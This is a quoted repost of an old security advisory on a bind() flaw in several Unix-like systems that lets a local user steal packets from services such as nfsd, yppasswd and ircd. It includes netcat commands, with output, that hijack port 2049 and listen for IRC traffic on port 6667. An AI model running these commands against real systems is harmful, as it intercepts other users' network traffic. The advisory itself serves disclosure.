> > > System Call: bind() > Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix > Probably others. > Requirement: account on system. > Security Compromise: Stealing packets from > nfsd, yppasswd, ircd, etc. > Credits: *Hobbit* <hobbit@avian.org> > bitblt <bitblt@infosoc.com> > Aleph One <aleph1@underground.org> > Synopsis: bind() does not properly check > to make sure there is not a socket > already bound to INADDR_ANY on the same > port when binding to a specific address. > IRIX 5.3 is vulnerable, too. > Exploit: [..] > Run netcat: > > w00p% nc -v -v -u -s 192.88.209.5 -p 2049 > listening on [192.88.209.5] 2049 ... To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667 -- > Bernd Lehle - Stuttgart University Computer Center * A supercomputer < > Visualization / SFB 382 / Astrophysics * is a machine < > lehle@rus.uni-stuttgart.de Tel:+49-711-685-5531 * that runs an < > http://www.tat.physik.uni-tuebingen.de/~lehle * endless loop < > pgp? -> finger bernd@visbl.rus.uni-stuttgart.de * in 2 seconds <